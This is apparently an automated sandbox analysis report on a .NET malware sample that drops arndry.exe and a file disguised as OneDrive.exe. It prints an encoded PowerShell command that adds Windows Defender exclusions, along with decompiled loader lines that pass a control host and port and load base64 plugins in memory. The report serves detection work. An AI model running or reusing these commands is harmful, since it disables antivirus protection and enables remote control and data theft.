                        Source: tmp1DE4.tmp.dat.0.dr, tmp8A59.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: b39wW3jYKO.exeReversingLabs: Detection: 55%
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile read: C:\Users\user\Desktop\b39wW3jYKO.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\b39wW3jYKO.exe "C:\Users\user\Desktop\b39wW3jYKO.exe"
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: unknownProcess created: C:\Users\user\Documents\OneDrive.exe "C:\Users\user\Documents\OneDrive.exe"
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Users\user\AppData\Local\Temp\arndry.exe "C:\Users\user\AppData\Local\Temp\arndry.exe"
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3804 -s 1632
                        Source: unknownProcess created: C:\Users\user\Documents\OneDrive.exe "C:\Users\user\Documents\OneDrive.exe"
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Users\user\AppData\Local\Temp\arndry.exe "C:\Users\user\AppData\Local\Temp\arndry.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: version.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Documents\OneDrive.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: b39wW3jYKO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: b39wW3jYKO.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: b39wW3jYKO.exeStatic file information: File size 1334272 > 1048576
                        Source: b39wW3jYKO.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12c200
                        Source: b39wW3jYKO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: b39wW3jYKO.exe, b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.pdb0 source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: protobuf-net.pdb source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.pdbH source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.pdb8e source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: Microsoft.VisualBasic.pdbP4 source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: arndry.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: arndry.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: b39wW3jYKO.exe, Client.cs.Net Code: RunGetter System.AppDomain.Load(byte[])
                        Source: arndry.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                        Source: arndry.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                        Source: arndry.exe.0.dr, Messages.cs.Net Code: Memory
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Yara detected Costura Assembly Loader
                        Source: Yara matchFile source: 14.2.OneDrive.exe.19a3725ea98.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.OneDrive.exe.12971b90000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.OneDrive.exe.129692f22f8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.OneDrive.exe.129691f1eb8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.2657598951.0000019A3725E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2577826782.00000129591E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2592825263.0000012971B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 3508, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 1472, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD3466896B push edx; ret 0_2_00007FFD34668975
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34667D69 push esp; iretd 0_2_00007FFD34667D73
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34752870 pushfd ; iretd 0_2_00007FFD34752879
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD347529A6 push ss; iretd 0_2_00007FFD347529A7
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD347F2C81 push 8B48FFEDh; retf 0_2_00007FFD347F2C86
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD347F9E11 push eax; ret 0_2_00007FFD347F9E41
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD347FD189 push ecx; retf 0_2_00007FFD347FD1BC
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD347F0AAA push esp; iretd 0_2_00007FFD347F0AAB
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E461CA pushad ; retn 5EDBh0_2_00007FFD34E4622D
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E4CDC2 push eax; iretd 0_2_00007FFD34E4CDC3
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E566B4 push DDEBE852h; iretd 0_2_00007FFD34E566D3
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E46664 push E8FFFFFFh; ret 0_2_00007FFD34E46669
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5CF93 push ebp; iretd 0_2_00007FFD34E5CFC9
